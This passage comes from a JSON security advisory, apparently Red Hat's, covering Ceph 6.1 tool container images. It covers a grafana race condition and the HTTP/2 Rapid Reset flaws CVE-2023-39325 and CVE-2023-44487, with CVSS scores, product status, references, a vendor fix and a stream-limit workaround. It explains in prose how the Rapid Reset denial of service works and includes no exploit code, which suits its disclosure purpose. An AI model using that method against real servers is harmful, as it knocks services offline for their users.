"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "grafana: data source proxy race condition"
},
{
"cve": "CVE-2023-39325",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2023-10-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2243296"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in handling multiplexed streams in the HTTP/2 protocol. A client can repeatedly make a request for a new multiplex stream and immediately send an RST_STREAM frame to cancel it. This creates extra work for the server setting up and tearing down the streams while not hitting any server-side limit for the maximum number of active streams per connection, resulting in a denial of service due to server resource consumption. Red Hat has rated the severity of this flaw as \u0027Important\u0027 as the US Cybersecurity and Infrastructure Security Agency (CISA) declared this vulnerability an active exploit.\r\n\r\nCVE-2023-39325 was assigned for the `Rapid Reset Attack` in the Go language packages.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487)",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This CVE is related to CVE-2023-44487.\n\nThe majority of RHEL utilities are not long-running applications; instead, they are command-line tools. These tools utilize Golang package as build-time dependency, which is why they are classified as having a \"Moderate\" level of impact.\n\nAs go-lang vendors its dependencies, a package may contain a library with a known vulnerability, solely because of lower tier libraries including it as a part of its dependencies, but the vulnerable code is not reachable at runtime. In such cases the issue is not exploitable. We classify these situations as \u201cNot affected\u201d or \u201cWill not fix,\u201d depending on the risk of breaking other unrelated packages.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64"
],
"known_not_affected": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-39325"
},
{
"category": "external",
"summary": "RHBZ#2243296",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2243296"
},
{
"category": "external",
"summary": "RHSB-2023-003",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-39325",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39325"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-39325",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39325"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2023-44487",
"url": "https://access.redhat.com/security/cve/CVE-2023-44487"
},
{
"category": "external",
"summary": "https://go.dev/issue/63417",
"url": "https://go.dev/issue/63417"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2023-2102",
"url": "https://pkg.go.dev/vuln/GO-2023-2102"
},
{
"category": "external",
"summary": "https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487",
"url": "https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487"
}
],
"release_date": "2023-10-10T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-12-12T13:55:37+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6\n\nFor supported configurations, refer to:\n\nhttps://access.redhat.com/articles/1548993",
"product_ids": [
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:7741"
},
{
"category": "workaround",
"details": "The default stream concurrency limit in golang is 250 streams (requests) per HTTP/2 connection. This value may be adjusted in the golang.org/x/net/http2 package using the Server.MaxConcurrentStreams setting and the ConfigureServer function which are available in golang.org/x/net/http2.",
"product_ids": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487)"
},
{
"cve": "CVE-2023-44487",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2023-10-09T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2242803"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in handling multiplexed streams in the HTTP/2 protocol. A client can repeatedly make a request for a new multiplex stream and immediately send an RST_STREAM frame to cancel it. This creates extra work for the server setting up and tearing down the streams while not hitting any server-side limit for the maximum number of active streams per connection, resulting in a denial of service due to server resource consumption. Red Hat has rated the severity of this flaw as \u0027Important\u0027 as the US Cybersecurity and Infrastructure Security Agency (CISA) declared this vulnerability an active exploit.\r\n\r\nCVE-2023-39325 was assigned for the Rapid Reset Attack in the Go language packages.\r\n\r\nSecurity Bulletin\r\nhttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack)",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "NGINX has been marked as Moderate Impact because, for performance and resource consumption reasons, NGINX limits the number of concurrent streams to a default of 128. In addition, to optimally balance network and server performance, NGINX allows the client to persist HTTP connections for up to 1000 requests by default using an HTTP keepalive.\n\nThe majority of RHEL utilities are not long-running applications; instead, they are command-line tools. These tools utilize Golang package as build-time dependency, which is why they are classified as having a \"Moderate\" level of impact.\n\nrhc component is no longer impacted by CVE-2023-44487 \u0026 CVE-2023-39325.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64"
],
"known_not_affected": [
